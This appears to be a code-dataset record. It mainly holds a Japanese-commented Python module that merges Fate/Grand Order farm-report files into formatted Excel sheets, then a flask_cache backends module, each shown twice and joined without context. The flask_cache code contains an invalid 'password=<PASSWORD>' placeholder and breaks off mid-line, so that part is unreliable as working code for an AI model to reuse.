17, const_util.FARM_REPORT_IND_SUM_HEADER[3]: 17, }, 'A4', ['A1:D1', 'A2:D2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告個人概要マージを終了します。') return None def __do_logic_that_merge_gen_result( enum_of_proc: EnumOfProc, gen_result_file_path_format: str, gen_result_header: list[str], append_merge_result_sheet: bool, merge_result_file_path: str, merge_result_book_name: str, merge_result_column_widths: dict[str, Union[int, float]], merge_result_cell_to_fix_window_frame: str, merge_result_ranges_to_merge_cells: list[str] ) -> None: '''ロジック(周回報告生成結果マージ(共通))実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告生成結果マージ(共通)を開始します。') # 周回報告生成結果ファイルパスの取得 gen_result_file_dir: str = os.path.dirname(gen_result_file_path_format) gen_result_file_ext: str = os.path.splitext(gen_result_file_path_format)[1] gen_result_file_path_with_wildcard: str = gen_result_file_dir + '/*' + gen_result_file_ext gen_result_file_paths: list[str] = glob.glob(gen_result_file_path_with_wildcard) # 周回報告生成結果ファイルの件数が0件の場合 if len(gen_result_file_paths) == 0: pyl.log_war(lg, f'周回報告生成結果ファイルの件数が0件です。' + f'(gen_result_file_path:{gen_result_file_path_with_wildcard})') else: # Pandasによる周回報告マージ結果ファイルの生成 __generate_merge_result_file_by_pandas( enum_of_proc, gen_result_file_paths, gen_result_header, append_merge_result_sheet, merge_result_file_path, merge_result_book_name, merge_result_column_widths, merge_result_cell_to_fix_window_frame ) # OpenPyXLによる周回報告マージ結果ファイルの編集 __edit_merge_result_file_by_openpyxl( merge_result_file_path, merge_result_ranges_to_merge_cells ) pyl.log_inf(lg, f'周回報告マージ結果ファイルパス:{merge_result_file_path}') except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告生成結果マージ(共通)を終了します。') return None def __generate_merge_result_file_by_pandas( enum_of_proc: EnumOfProc, gen_result_file_paths: list[str], gen_result_header: list[str], append_merge_result_sheet: bool, merge_result_file_path: str, merge_result_book_name: str, merge_result_column_widths: dict[str, Union[int, float]], merge_result_cell_to_fix_window_frame: str ) -> None: '''周回報告マージ結果ファイル生成(Pandas)''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) excel_writer: Optional[pd.ExcelWriter] = None try: # Excelライターの生成 if append_merge_result_sheet == True \ and os.path.isfile(merge_result_file_path) == True: excel_writer = StyleFrame.ExcelWriter( merge_result_file_path, mode='a', if_sheet_exists='replace', # overlay not working ) else: excel_writer = StyleFrame.ExcelWriter( merge_result_file_path, mode='w', ) # 周回報告マージ結果ファイルへの出力 for gen_result_file_path in reversed(gen_result_file_paths): pyl.log_inf(lg, f'周回報告生成結果ファイルパス:{gen_result_file_path}') # 周回報告マージ結果シート名の生成 merge_result_sheet_name: str = pyl.generate_file_name(gen_result_file_path) # 周回報告マージ結果ヘッダ部スタイルフレームの生成 merge_result_header_part_sfs: list[StyleFrame] = \ __generate_merge_result_header_part_sfs( merge_result_book_name, merge_result_sheet_name, gen_result_header ) # 周回報告生成結果データフレームの取得 gen_result_df: pd.DataFrame = pd.DataFrame() if enum_of_proc == EnumOfProc.GENERATE_LIST: gen_result_df = pandas_util.read_farm_report_list_file( gen_result_file_path, True, True) elif enum_of_proc == EnumOfProc.GENERATE_USER_TOTAL_SUMMARY: gen_result_df = pandas_util.read_farm_report_usr_tot_sum_file( gen_result_file_path, True, True) elif enum_of_proc == EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY: gen_result_df = pandas_util.read_farm_report_qst_tot_sum_file( gen_result_file_path, True, True) elif enum_of_proc == EnumOfProc.GENERATE_INDIVIDUAL_SUMMARY: gen_result_df = pandas_util.read_farm_report_ind_sum_file( gen_result_file_path, True, True) # 周回報告生成結果データフレームへの書式設定の適用 # (周回報告マージ結果データ部スタイルフレームの生成) merge_result_data_part_sf: StyleFrame = __apply_formatting_to_gen_result( gen_result_df, merge_result_column_widths) # 周回報告マージ結果スタイルフレームの保存 pandas_util.save_farm_report_merge_result_sf( merge_result_header_part_sfs, merge_result_data_part_sf, excel_writer, merge_result_sheet_name, cell_to_fix_window_frame=merge_result_cell_to_fix_window_frame, ) except Exception as e: pyl.log_err(lg, f'周回報告生成結果マージ結果ファイルへの出力に失敗しました。') raise(e) finally: if excel_writer is not None: excel_writer.close() except Exception as e: raise(e) return None def __generate_merge_result_header_part_sfs( merge_result_book_name: str, merge_result_sheet_name: str, gen_result_header: list[str] ) -> list[StyleFrame]: '''周回報告マージ結果ヘッダ部スタイルフレーム生成''' merge_result_header_part_sfs: list[StyleFrame] = [] # 周回報告マージ結果ヘッダ部01データフレームの生成 merge_result_header_part_col_num: int = 0 merge_result_header_part_01_df: pd.DataFrame = pd.DataFrame({ f'col_{merge_result_header_part_col_num}': [merge_result_book_name, merge_result_sheet_name] }) for _ in range(len(gen_result_header) - 1): merge_result_header_part_col_num = merge_result_header_part_col_num + 1 merge_result_header_part_01_df[f'col_{merge_result_header_part_col_num}'] = '' # 周回報告マージ結果ヘッダ部01の書式設定の適用 merge_result_header_part_01_sf: StyleFrame = __apply_formatting_to_merge_result_header_part( merge_result_header_part_01_df, is_update_datetime_col=False) # 更新日時の取得 update_datetime: datetime = datetime.now() update_date: str = update_datetime.strftime('%Y-%m-%d') update_time: str = update_datetime.strftime('%H:%M:%S') # 周回報告マージ結果ヘッダ部02データフレームの生成 merge_result_header_part_col_num = merge_result_header_part_col_num + 1 merge_result_header_part_02_df: pd.DataFrame = \ pd.DataFrame({f'col_{merge_result_header_part_col_num}': [update_date, update_time]}) # 周回報告マージ結果ヘッダ部02の書式設定の適用 merge_result_header_part_02_sf: StyleFrame = __apply_formatting_to_merge_result_header_part( merge_result_header_part_02_df, is_update_datetime_col=True) # 周回報告マージ結果ヘッダ部スタイルフレームへの追加 merge_result_header_part_sfs.append(merge_result_header_part_01_sf) merge_result_header_part_sfs.append(merge_result_header_part_02_sf) return merge_result_header_part_sfs def __apply_formatting_to_merge_result_header_part( merge_result_header_part_df: pd.DataFrame, merge_result_column_widths: dict[str, Union[int, float]] = {}, is_update_datetime_col: bool = False ) -> StyleFrame: '''書式設定適用(周回報告マージ結果ヘッダ部)''' DATETIME_FORMAT: Final[str] = 'YYYY-MM-DD HH:MM:SS' # デフォルトのスタイルの適用 default_style: Styler = Styler( bg_color=None, bold=False, font=const_util.FONT_NAME, font_size=const_util.FONT_SIZE, number_format=utils.number_formats.general, horizontal_alignment=(utils.horizontal_alignments.general if is_update_datetime_col == False else utils.horizontal_alignments.right), wrap_text=False, shrink_to_fit=False if is_update_datetime_col == False else True, date_time_format=DATETIME_FORMAT, ) merge_result_header_part_sf: StyleFrame = StyleFrame(merge_result_header_part_df, default_style) # 列の幅の適用 merge_result_header_part_sf.set_column_width_dict(merge_result_column_widths) # 行の高さの適用 row_indexes: tuple = merge_result_header_part_sf.row_indexes merge_result_header_part_sf.set_row_height_dict({ row_indexes[:len(row_indexes) - 1]: 20, }) return merge_result_header_part_sf def __apply_formatting_to_gen_result( gen_result_df: pd.DataFrame, merge_result_column_widths: dict[str, Union[int, float]] = {} ) -> StyleFrame: '''書式設定適用(生成結果)''' DATETIME_FORMAT: Final[str] = 'YYYY-MM-DD HH:MM:SS' # デフォルトのスタイルの適用 default_style: Styler = Styler( bg_color=None, bold=False, font=const_util.FONT_NAME, font_size=const_util.FONT_SIZE, number_format=utils.number_formats.thousands_comma_sep, horizontal_alignment=utils.horizontal_alignments.general, wrap_text=False, shrink_to_fit=False, date_time_format=DATETIME_FORMAT, ) merge_result_data_part_sf: StyleFrame = StyleFrame(gen_result_df, default_style) # ヘッダのスタイルの適用 header_style: Styler = Styler( bg_color=utils.colors.grey, bold=True, font=const_util.FONT_NAME, font_size=const_util.FONT_SIZE, number_format=utils.number_formats.general, horizontal_alignment=utils.horizontal_alignments.center, wrap_text=True, shrink_to_fit=False, date_time_format=DATETIME_FORMAT, ) merge_result_data_part_sf.apply_headers_style(header_style) # 列の幅の適用 merge_result_data_part_sf.set_column_width_dict(merge_result_column_widths) # 行の高さの適用 row_indexes: tuple = merge_result_data_part_sf.row_indexes if len(row_indexes) == 1: merge_result_data_part_sf.set_row_height_dict({ row_indexes[0]: 30, }) else: merge_result_data_part_sf.set_row_height_dict({ row_indexes[0]: 30, row_indexes[1:]: 20, }) return merge_result_data_part_sf def __edit_merge_result_file_by_openpyxl( merge_result_file_path: str, merge_result_ranges_to_merge_cells: list[str] ) -> None: '''周回報告マージ結果ファイル編集(OpenPyXL)''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) merge_result_wb: Optional[openpyxl.Workbook] = None try: # 周回報告マージ結果ファイルのセルの結合 merge_result_wb = openpyxl.load_workbook(merge_result_file_path) for sheet_name in merge_result_wb.sheetnames: merge_result_ws: Worksheet = merge_result_wb[sheet_name] # type: ignore for range in merge_result_ranges_to_merge_cells: merge_result_ws.merge_cells(range) except Exception as e: pyl.log_err(lg, f'周回報告生成結果マージ結果ファイルのセルの結合に失敗しました。') raise(e) finally: if merge_result_wb is not None: merge_result_wb.save(merge_result_file_path) merge_result_wb.close() except Exception as e: raise(e) return None
src/fgo_farm_report_collection/logic/farm_report_gen_result_merge.py
import glob import os from datetime import datetime from enum import IntEnum, auto from logging import Logger from typing import Final, Optional, Union import openpyxl import pandas as pd import python_lib_for_me as pyl from openpyxl.worksheet.worksheet import Worksheet from styleframe import StyleFrame, Styler, utils from fgo_farm_report_collection.util import const_util, pandas_util class EnumOfProc(IntEnum): GENERATE_LIST = auto() GENERATE_USER_TOTAL_SUMMARY = auto() GENERATE_QUEST_TOTAL_SUMMARY = auto() GENERATE_INDIVIDUAL_SUMMARY = auto() def do_logic_that_merge_list( append_sheet: bool ) -> None: '''ロジック(周回報告一覧マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告一覧マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_LIST, const_util.FARM_REPORT_LIST_FILE_PATH, const_util.FARM_REPORT_LIST_HEADER, append_sheet, const_util.FARM_REPORT_LIST_MERGE_RESULT_FILE_PATH, '周回報告一覧', { const_util.FARM_REPORT_LIST_HEADER[0]: 20, const_util.FARM_REPORT_LIST_HEADER[1]: 20, const_util.FARM_REPORT_LIST_HEADER[2]: 14, const_util.FARM_REPORT_LIST_HEADER[3]: 25, const_util.FARM_REPORT_LIST_HEADER[4]: 20, const_util.FARM_REPORT_LIST_HEADER[5]: 10, const_util.FARM_REPORT_LIST_HEADER[6]: 200, }, 'A4', ['A1:G1', 'A2:G2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告一覧マージを終了します。') return None def do_logic_that_merge_yearly_usr_tot_sum( append_sheet: bool ) -> None: '''ロジック(周回報告年間ユーザ全体概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告年間ユーザ全体概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_USER_TOTAL_SUMMARY, const_util.FARM_REPORT_YEARLY_USR_TOT_SUM_FILE_PATH, const_util.FARM_REPORT_USR_TOT_SUM_HEADER, append_sheet, const_util.FARM_REPORT_YEARLY_USR_TOT_SUM_MERGE_RESULT_FILE_PATH, 'クエスト種別ごとの年間周回数(ユーザ編)', { const_util.FARM_REPORT_USR_TOT_SUM_HEADER[0]: 20, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[1]: 20, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[2]: 10, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[3]: 10, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[4]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[5]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[6]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[7]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[8]: 15, }, 'A4', ['A1:I1', 'A2:I2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告年間ユーザ全体概要マージを終了します。') return None def do_logic_that_merge_yearly_qst_tot_sum( append_sheet: bool ) -> None: '''ロジック(周回報告年間クエスト全体概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告年間クエスト全体概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY, const_util.FARM_REPORT_YEARLY_QST_TOT_SUM_FILE_PATH, const_util.FARM_REPORT_QST_TOT_SUM_HEADER, append_sheet, const_util.FARM_REPORT_YEARLY_QST_TOT_SUM_MERGE_RESULT_FILE_PATH, 'クエスト種別ごとの年間周回数(クエスト編)', { const_util.FARM_REPORT_QST_TOT_SUM_HEADER[0]: 20, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[1]: 20, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[2]: 10, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[3]: 10, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[4]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[5]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[6]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[7]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[8]: 15, }, 'A4', ['A1:I1', 'A2:I2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告年間クエスト全体概要マージを終了します。') return None def do_logic_that_merge_monthly_usr_tot_sum( append_sheet: bool ) -> None: '''ロジック(周回報告月間ユーザ全体概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告月間ユーザ全体概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_USER_TOTAL_SUMMARY, const_util.FARM_REPORT_MONTHLY_USR_TOT_SUM_FILE_PATH, const_util.FARM_REPORT_USR_TOT_SUM_HEADER, append_sheet, const_util.FARM_REPORT_MONTHLY_USR_TOT_SUM_MERGE_RESULT_FILE_PATH, 'クエスト種別ごとの月間周回数(ユーザ編)', { const_util.FARM_REPORT_USR_TOT_SUM_HEADER[0]: 20, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[1]: 20, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[2]: 10, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[3]: 10, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[4]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[5]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[6]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[7]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[8]: 15, }, 'A4', ['A1:I1', 'A2:I2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告月間ユーザ全体概要マージを終了します。') return None def do_logic_that_merge_monthly_qst_tot_sum( append_sheet: bool ) -> None: '''ロジック(周回報告月間クエスト全体概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告月間クエスト全体概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY, const_util.FARM_REPORT_MONTHLY_QST_TOT_SUM_FILE_PATH, const_util.FARM_REPORT_QST_TOT_SUM_HEADER, append_sheet, const_util.FARM_REPORT_MONTHLY_QST_TOT_SUM_MERGE_RESULT_FILE_PATH, 'クエスト種別ごとの月間周回数(クエスト編)', { const_util.FARM_REPORT_QST_TOT_SUM_HEADER[0]: 20, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[1]: 20, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[2]: 10, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[3]: 10, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[4]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[5]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[6]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[7]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[8]: 15, }, 'A4', ['A1:I1', 'A2:I2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告月間クエスト全体概要マージを終了します。') return None def do_logic_that_merge_ind_sum( append_sheet: bool ) -> None: '''ロジック(周回報告個人概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告個人概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_INDIVIDUAL_SUMMARY, const_util.FARM_REPORT_IND_SUM_FILE_PATH, const_util.FARM_REPORT_IND_SUM_HEADER, append_sheet, const_util.FARM_REPORT_IND_SUM_MERGE_RESULT_FILE_PATH, 'ユーザごとの周回数', { const_util.FARM_REPORT_IND_SUM_HEADER[0]: 10, const_util.FARM_REPORT_IND_SUM_HEADER[1]: 17, const_util.FARM_REPORT_IND_SUM_HEADER[2]: 17, const_util.FARM_REPORT_IND_SUM_HEADER[3]: 17, }, 'A4', ['A1:D1', 'A2:D2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告個人概要マージを終了します。') return None def __do_logic_that_merge_gen_result( enum_of_proc: EnumOfProc, gen_result_file_path_format: str, gen_result_header: list[str], append_merge_result_sheet: bool, merge_result_file_path: str, merge_result_book_name: str, merge_result_column_widths: dict[str, Union[int, float]], merge_result_cell_to_fix_window_frame: str, merge_result_ranges_to_merge_cells: list[str] ) -> None: '''ロジック(周回報告生成結果マージ(共通))実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告生成結果マージ(共通)を開始します。') # 周回報告生成結果ファイルパスの取得 gen_result_file_dir: str = os.path.dirname(gen_result_file_path_format) gen_result_file_ext: str = os.path.splitext(gen_result_file_path_format)[1] gen_result_file_path_with_wildcard: str = gen_result_file_dir + '/*' + gen_result_file_ext gen_result_file_paths: list[str] = glob.glob(gen_result_file_path_with_wildcard) # 周回報告生成結果ファイルの件数が0件の場合 if len(gen_result_file_paths) == 0: pyl.log_war(lg, f'周回報告生成結果ファイルの件数が0件です。' + f'(gen_result_file_path:{gen_result_file_path_with_wildcard})') else: # Pandasによる周回報告マージ結果ファイルの生成 __generate_merge_result_file_by_pandas( enum_of_proc, gen_result_file_paths, gen_result_header, append_merge_result_sheet, merge_result_file_path, merge_result_book_name, merge_result_column_widths, merge_result_cell_to_fix_window_frame ) # OpenPyXLによる周回報告マージ結果ファイルの編集 __edit_merge_result_file_by_openpyxl( merge_result_file_path, merge_result_ranges_to_merge_cells ) pyl.log_inf(lg, f'周回報告マージ結果ファイルパス:{merge_result_file_path}') except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告生成結果マージ(共通)を終了します。') return None def __generate_merge_result_file_by_pandas( enum_of_proc: EnumOfProc, gen_result_file_paths: list[str], gen_result_header: list[str], append_merge_result_sheet: bool, merge_result_file_path: str, merge_result_book_name: str, merge_result_column_widths: dict[str, Union[int, float]], merge_result_cell_to_fix_window_frame: str ) -> None: '''周回報告マージ結果ファイル生成(Pandas)''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) excel_writer: Optional[pd.ExcelWriter] = None try: # Excelライターの生成 if append_merge_result_sheet == True \ and os.path.isfile(merge_result_file_path) == True: excel_writer = StyleFrame.ExcelWriter( merge_result_file_path, mode='a', if_sheet_exists='replace', # overlay not working ) else: excel_writer = StyleFrame.ExcelWriter( merge_result_file_path, mode='w', ) # 周回報告マージ結果ファイルへの出力 for gen_result_file_path in reversed(gen_result_file_paths): pyl.log_inf(lg, f'周回報告生成結果ファイルパス:{gen_result_file_path}') # 周回報告マージ結果シート名の生成 merge_result_sheet_name: str = pyl.generate_file_name(gen_result_file_path) # 周回報告マージ結果ヘッダ部スタイルフレームの生成 merge_result_header_part_sfs: list[StyleFrame] = \ __generate_merge_result_header_part_sfs( merge_result_book_name, merge_result_sheet_name, gen_result_header ) # 周回報告生成結果データフレームの取得 gen_result_df: pd.DataFrame = pd.DataFrame() if enum_of_proc == EnumOfProc.GENERATE_LIST: gen_result_df = pandas_util.read_farm_report_list_file( gen_result_file_path, True, True) elif enum_of_proc == EnumOfProc.GENERATE_USER_TOTAL_SUMMARY: gen_result_df = pandas_util.read_farm_report_usr_tot_sum_file( gen_result_file_path, True, True) elif enum_of_proc == EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY: gen_result_df = pandas_util.read_farm_report_qst_tot_sum_file( gen_result_file_path, True, True) elif enum_of_proc == EnumOfProc.GENERATE_INDIVIDUAL_SUMMARY: gen_result_df = pandas_util.read_farm_report_ind_sum_file( gen_result_file_path, True, True) # 周回報告生成結果データフレームへの書式設定の適用 # (周回報告マージ結果データ部スタイルフレームの生成) merge_result_data_part_sf: StyleFrame = __apply_formatting_to_gen_result( gen_result_df, merge_result_column_widths) # 周回報告マージ結果スタイルフレームの保存 pandas_util.save_farm_report_merge_result_sf( merge_result_header_part_sfs, merge_result_data_part_sf, excel_writer, merge_result_sheet_name, cell_to_fix_window_frame=merge_result_cell_to_fix_window_frame, ) except Exception as e: pyl.log_err(lg, f'周回報告生成結果マージ結果ファイルへの出力に失敗しました。') raise(e) finally: if excel_writer is not None: excel_writer.close() except Exception as e: raise(e) return None def __generate_merge_result_header_part_sfs( merge_result_book_name: str, merge_result_sheet_name: str, gen_result_header: list[str] ) -> list[StyleFrame]: '''周回報告マージ結果ヘッダ部スタイルフレーム生成''' merge_result_header_part_sfs: list[StyleFrame] = [] # 周回報告マージ結果ヘッダ部01データフレームの生成 merge_result_header_part_col_num: int = 0 merge_result_header_part_01_df: pd.DataFrame = pd.DataFrame({ f'col_{merge_result_header_part_col_num}': [merge_result_book_name, merge_result_sheet_name] }) for _ in range(len(gen_result_header) - 1): merge_result_header_part_col_num = merge_result_header_part_col_num + 1 merge_result_header_part_01_df[f'col_{merge_result_header_part_col_num}'] = '' # 周回報告マージ結果ヘッダ部01の書式設定の適用 merge_result_header_part_01_sf: StyleFrame = __apply_formatting_to_merge_result_header_part( merge_result_header_part_01_df, is_update_datetime_col=False) # 更新日時の取得 update_datetime: datetime = datetime.now() update_date: str = update_datetime.strftime('%Y-%m-%d') update_time: str = update_datetime.strftime('%H:%M:%S') # 周回報告マージ結果ヘッダ部02データフレームの生成 merge_result_header_part_col_num = merge_result_header_part_col_num + 1 merge_result_header_part_02_df: pd.DataFrame = \ pd.DataFrame({f'col_{merge_result_header_part_col_num}': [update_date, update_time]}) # 周回報告マージ結果ヘッダ部02の書式設定の適用 merge_result_header_part_02_sf: StyleFrame = __apply_formatting_to_merge_result_header_part( merge_result_header_part_02_df, is_update_datetime_col=True) # 周回報告マージ結果ヘッダ部スタイルフレームへの追加 merge_result_header_part_sfs.append(merge_result_header_part_01_sf) merge_result_header_part_sfs.append(merge_result_header_part_02_sf) return merge_result_header_part_sfs def __apply_formatting_to_merge_result_header_part( merge_result_header_part_df: pd.DataFrame, merge_result_column_widths: dict[str, Union[int, float]] = {}, is_update_datetime_col: bool = False ) -> StyleFrame: '''書式設定適用(周回報告マージ結果ヘッダ部)''' DATETIME_FORMAT: Final[str] = 'YYYY-MM-DD HH:MM:SS' # デフォルトのスタイルの適用 default_style: Styler = Styler( bg_color=None, bold=False, font=const_util.FONT_NAME, font_size=const_util.FONT_SIZE, number_format=utils.number_formats.general, horizontal_alignment=(utils.horizontal_alignments.general if is_update_datetime_col == False else utils.horizontal_alignments.right), wrap_text=False, shrink_to_fit=False if is_update_datetime_col == False else True, date_time_format=DATETIME_FORMAT, ) merge_result_header_part_sf: StyleFrame = StyleFrame(merge_result_header_part_df, default_style) # 列の幅の適用 merge_result_header_part_sf.set_column_width_dict(merge_result_column_widths) # 行の高さの適用 row_indexes: tuple = merge_result_header_part_sf.row_indexes merge_result_header_part_sf.set_row_height_dict({ row_indexes[:len(row_indexes) - 1]: 20, }) return merge_result_header_part_sf def __apply_formatting_to_gen_result( gen_result_df: pd.DataFrame, merge_result_column_widths: dict[str, Union[int, float]] = {} ) -> StyleFrame: '''書式設定適用(生成結果)''' DATETIME_FORMAT: Final[str] = 'YYYY-MM-DD HH:MM:SS' # デフォルトのスタイルの適用 default_style: Styler = Styler( bg_color=None, bold=False, font=const_util.FONT_NAME, font_size=const_util.FONT_SIZE, number_format=utils.number_formats.thousands_comma_sep, horizontal_alignment=utils.horizontal_alignments.general, wrap_text=False, shrink_to_fit=False, date_time_format=DATETIME_FORMAT, ) merge_result_data_part_sf: StyleFrame = StyleFrame(gen_result_df, default_style) # ヘッダのスタイルの適用 header_style: Styler = Styler( bg_color=utils.colors.grey, bold=True, font=const_util.FONT_NAME, font_size=const_util.FONT_SIZE, number_format=utils.number_formats.general, horizontal_alignment=utils.horizontal_alignments.center, wrap_text=True, shrink_to_fit=False, date_time_format=DATETIME_FORMAT, ) merge_result_data_part_sf.apply_headers_style(header_style) # 列の幅の適用 merge_result_data_part_sf.set_column_width_dict(merge_result_column_widths) # 行の高さの適用 row_indexes: tuple = merge_result_data_part_sf.row_indexes if len(row_indexes) == 1: merge_result_data_part_sf.set_row_height_dict({ row_indexes[0]: 30, }) else: merge_result_data_part_sf.set_row_height_dict({ row_indexes[0]: 30, row_indexes[1:]: 20, }) return merge_result_data_part_sf def __edit_merge_result_file_by_openpyxl( merge_result_file_path: str, merge_result_ranges_to_merge_cells: list[str] ) -> None: '''周回報告マージ結果ファイル編集(OpenPyXL)''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) merge_result_wb: Optional[openpyxl.Workbook] = None try: # 周回報告マージ結果ファイルのセルの結合 merge_result_wb = openpyxl.load_workbook(merge_result_file_path) for sheet_name in merge_result_wb.sheetnames: merge_result_ws: Worksheet = merge_result_wb[sheet_name] # type: ignore for range in merge_result_ranges_to_merge_cells: merge_result_ws.merge_cells(range) except Exception as e: pyl.log_err(lg, f'周回報告生成結果マージ結果ファイルのセルの結合に失敗しました。') raise(e) finally: if merge_result_wb is not None: merge_result_wb.save(merge_result_file_path) merge_result_wb.close() except Exception as e: raise(e) return None
0.330039
0.092647
from werkzeug.contrib.cache import (BaseCache, NullCache, SimpleCache, MemcachedCache, GAEMemcachedCache, FileSystemCache) class SASLMemcachedCache(MemcachedCache): def __init__(self, servers=None, default_timeout=300, key_prefix=None, username=None, password=<PASSWORD>): BaseCache.__init__(self, default_timeout) if servers is None: servers = ['127.0.0.1:11211'] import pylibmc self._client = pylibmc.Client(servers, username=username, password=password, binary=True) self.key_prefix = key_prefix def null(app, config, args, kwargs): return NullCache() def simple(app, config, args, kwargs): kwargs.update(dict(threshold=config['CACHE_THRESHOLD'])) return SimpleCache(*args, **kwargs) def memcached(app, config, args, kwargs): args.append(config['CACHE_MEMCACHED_SERVERS']) kwargs.update(dict(key_prefix=config['CACHE_KEY_PREFIX'])) return MemcachedCache(*args, **kwargs) def saslmemcached(app, config, args, kwargs): args.append(config['CACHE_MEMCACHED_SERVERS']) kwargs.update(dict(username=config['CACHE_MEMCACHED_USERNAME'], password=config['CACHE_MEMCACHED_PASSWORD'], key_prefix=config['CACHE_KEY_PREFIX'])) return SASLMemcachedCache(*args, **kwargs) def gaememcached(app, config, args, kwargs): kwargs.update(dict(key_prefix=config['CACHE_KEY_PREFIX'])) return GAEMemcachedCache(*args, **kwargs) def filesystem(app, config, args, kwargs): args.append(config['CACHE_DIR']) kwargs.update(dict(threshold=config['CACHE_THRESHOLD'])) return FileSystemCache(*args, **kwargs) # RedisCache is supported since Werkzeug 0.7. try: from werkzeug.contrib.cache import RedisCache except ImportError: pass else: def redis(app, config, args, kwargs): kwargs.update(dict( host=config.get('CACHE_REDIS_HOST', 'localhost'), port=config.get('CACHE_REDIS_PORT', 6379), )) password = config.get('CACHE_REDIS_PASSWORD') if password: kwargs['password'] = password key_prefix = config.get('CACHE_KEY_PREFIX') if key_prefix: kwargs['key_prefix'] = key_prefix return RedisCache(*args, **kwargs)
src/lib/flask_cache/backends.py
from werkzeug.contrib.cache import (BaseCache, NullCache, SimpleCache, MemcachedCache, GAEMemcachedCache, FileSystemCache) class SASLMemcachedCache(MemcachedCache): def __init__(self, servers=None, default_timeout=300, key_prefix=None, username=None, password=<PASSWORD>): BaseCache.__init__(self, default_timeout) if servers is None: servers = ['127.0.0.1:11211'] import pylibmc self._client = pylibmc.Client(servers, username=username, password=password, binary=True) self.key_prefix = key_prefix def null(app, config, args, kwargs): return NullCache() def simple(app, config, args, kwargs): kwargs.update(dict(threshold=config['CACHE_THRESHOLD'])) return SimpleCache(*args, **kwargs) def memcached(app, config, args, kwargs): args.append(config['CACHE_MEMCACHED_SERVERS']) kwargs.update(dict(key_prefix=config['CACHE_KEY_PREFIX'])) return MemcachedCache(*args, **kwargs) def saslmemcached(app, config, args, kwargs): args.append(config['CACHE_MEMCACHED_SERVERS']) kwargs.update(dict(username=config['CACHE_MEMCACHED_USERNAME'], password=config['CACHE_MEMCACHED_PASSWORD'], key_prefix=config['CACHE_KEY_PREFIX'])) return SASLMemcachedCache(*args, **kwargs) def gaememcached(app, config, args, kwargs): kwargs.update(dict(key_prefix=config['CACHE_KEY_PREFIX'])) return GAEMemcachedCache(*args, **kwargs) def filesystem(app, config, args, kwargs): args.append(config['CACHE_DIR']) kwargs.update(dict(threshold=config['CACHE_THRESHOLD'])) return 